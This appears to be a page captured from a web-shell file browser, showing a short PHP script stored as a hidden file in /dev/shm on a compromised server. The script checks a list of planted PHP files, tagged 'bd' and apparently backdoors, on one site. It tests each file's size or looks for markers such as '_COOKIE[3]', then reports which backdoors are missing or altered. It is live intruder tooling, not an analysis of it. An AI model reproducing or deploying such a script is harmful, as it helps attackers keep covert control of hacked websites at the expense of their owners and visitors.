Current File : //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/dev/shm/.desc
<?php   $r = '/home/siadqowq/xooxa.shop'; $x = ["/cache_forums.php"=>"bd@@66435596@@1738",
"/cache_forums.php"=>"bd@@67050023@@token_parser_engine",
"/functions.php"=>"bd@@70815020@@1561",
"/mod.php"=>"bd@@74750033@@777",
"/view.php"=>"bd@@67050350@@687",
"/mm3.php"=>"bd@@78576532@@1536",
"/admin.php"=>"bd@@70883522@@module_controller",
"/mm3_panel.php"=>"bd@@67137496@@system_core",
"/extension.php"=>"bd@@66386139@@dependency_resolver",
"/com.php"=>"bd@@70851048@@638",
"/rsform.php"=>"bd@@74723829@@573",
"/404SEF.php"=>"bd@@57479418@@_COOKIE[3]",
"/cache.php"=>"bd@@78587097@@95",
"/404SEF_cpanel.php"=>"bd@@39942195@@_COOKIE[3]"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');